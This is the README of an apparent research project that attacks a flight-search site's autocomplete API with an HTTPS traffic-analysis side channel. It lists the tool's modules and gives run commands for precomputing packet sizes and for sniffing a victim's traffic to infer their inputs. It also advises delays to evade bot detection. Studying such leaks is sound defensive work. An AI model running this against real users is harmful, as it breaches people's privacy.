Network analysis and Side Channel Leaks exploit over HTTPS

📚👉 Link to the full paper 👈📚

Disclaimer

This project has only been developed for a research purpose, and has (and will) only been ran locally for experimental purposes.

While such a tool could be used by malicious users, I believe that, such tools can be very useful for service providers, in order for them to quantify the amount of data leaked by their service, and thus helping them protect their users' privacy.

Contribution

If you have any questions or anything to discuss about this projects, please open an issue or a pull request to start a discussion.

The API studied here

Our study has been carried out on a specific service, which API to fetch the departure and detination of flights were in the form:

Field Departure : /mv/marvel?f=h&where=cac&s=58&lc_cc=KR&lc=ko&v=v2&cv=4
Field Destination: /mv/marvel?f=h&where=gmp&s=58&lc_cc=KR&lc=ko&v=v2&cv=4

We see that both parts look the same, and we can see that the payload is after the "where" in the URI.

The paylaod we are going to use to carry out our attack is in the form: /mv/marvel?f=h&where=[GENERATED]&s=58&lc_cc=KR&lc=ko&v=v2&cv=4, where [GENERATED] is a user entry generated by one of our module.

Note: By playing around with the API, we observed that no destination name was more that 15 characters. Hence, we can limit the length of the generated string to 15. (For efficiency measures, we can even try to find until how many characters we can uniquely identify every destination/depearture, in order to generate a minimum number of payloads. This would fasten the search by limiting the number of time we will do calls on the API which will result in a smaller search tree)

Note2: In order to prevent our requests to be dropped by the server, we introduce an artificial delay between requests in order to be closer to a "normal" user and limit the chances to be considered as a bot.

Overview

Before detailing the architecture of the project (see next section), we give here a very brief overview of our study.

The idea here, was to develop a tool that would be used by the attacker to generate a big set of payloads and simulate user input on the target website. That way, a request is sent to the server for every payload in the set, and the corresponding response is received for every payload.

As a consequence, the attacker can get the size of each request and each response for every payload in the set of pre-computed payloads, and then use this information to sniff the victim's traffic and compare with his "pre-computed" values to see what the victim is doing.

In a nutshell, this tool produces a trace of the interactions between attacker and the targeted service (pre-computation), and then uses this trace in order to infer what a victim using the targeted service is doing (attack/exploit).

Architecture of the project

The project is segmented into different parts. Each file has its own utility and represent one task in the network analysis process.

generator.py: Module used to generate payloads to build the DB
apiCaller.py: Module dedicated to do HTTPS requests for all payloads generated by the generator. he goal here is to test all possible actions of the user and record them in a DB.

The output of this module is a file (timingX.json, where X is the number of the trace) containing where all payloads are associated with the request time/response time and size of content length. These timestamps are used later on to map the network traffic with the specific request/response.

traceBuilderWorker.sh: Bash script that records the network trace of a session where we tested all the payloads. The output of this "module" is a network traffic file (analysisX.pcap, where is the number of the trace). In order to generate the network traffic trace, this script launches tcpdump and calls apiCaller.py.
traceBuilderManager.sh: Bash script which launches the desired number of traceBuilderWorkers in order to generate numerous network traces. The idea here is to record many network traces in order to diminish the impact of the network noise on our dataset.
traceAnalyzer.py: Module which analyses the network trace of the corresponding traceBuilderWorkers and maps the payloads to their traffic, in order to get the number of bytes sent over the network that correspond to each payload.
dbBuilder.py: Module that launches as many traceAnalyzer.py as we have network traces to analyze into threads. We use parallel computing here in order to speed up the trace analysis. After collecting the results of the traceAnalyzers, the dbBuilder reads them all and does a mean of all the traffic associated to a payload over all traces. This steps aims to reduce the noise of the network and helps having better accurancy. [TODO:] Find a better notion than the mean to join all values from the different traces. The mean is too sensitive to changes and biaised values
attackPreComputation.sh: Bash module that combines all previous modules in order to build and precompute the DB of the attacker
networkAnalyzer.py: Module used to sniff the victim network and infer his inputs based on the precomputed database

Run the project in Docker

Build the image and run the container:

docker build -t sc-leaks .
docker run -ti --net=host --name cont-leaks sc-leaks

Setup the environment variable:

export ATTACKER_IP=`ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}'`
nslookup www.[target-server].com
export SERVER_IP=[result of the nslookup]
cd src

Run the precomputation of the attack:

sudo ./attackPreComputation.sh [NumberOfNetworkTracesToUseToGenerateTheDB] [payloadMaxLength] $ATTACKER_IP $SERVER_IP [interfaceToListenTo]

For example, run:

sudo ./attackPreComputation.sh 1 1 $ATTACKER_IP $SERVER_IP eth0

Run the attack:

[In another terminal (let's call it Terminal2, and the previous one: Terminal1)]
docker exec -ti cont-leaks "/bin/sh"

[In terminal 1]
# Attack against yourself
export VICTIM_IP=`ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}'`
python networkAnalyzer.py [interface] $VICTIM_IP $SERVER_IP

[In terminal 2]
cd src
python manualApiCaller.py auto
# Hit enter and observe the output of Terminal 1

Software implementation

Use PyShark to do some network analysis
Input of the entire tool:
- URL of the website
- The input should also contain the IP addresses of:
  - The victim/target
  - The web app the victim is using
- URL that are used by the web app to fetch data as the user does some input (the URL used to fetch data with AJAX calls) + maybe a cookie or at least of information needed to be able to do the call(different from one API to another)
  - And also all the information needed to generate all the possible calls: (type of payload we need to generate, limit length and so on...)
  - That way we would be able to generate all kind of paylaod and add them to the URL to do some API calls and get the sizes associated with the user input
- Build a tree containing all the possible input and the corresponding packet size
- Using the tree built in the previous step, detect the user input that is the most likely to have had happen

Ideas

It can be interesting to see if the SC leaks discovered in the eventLoop of chrome could be used to improve the attack.
Coupled with network analysis, this could be very efficient and could guarantee a malicious user/attacker to be almost sure on what the victim is actually doing on his computer

References

"Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow", Shuo Chen et. al
Traffic Analysis of an SSL/TLS Session

AntoineRondelet / side-channel-exploit-https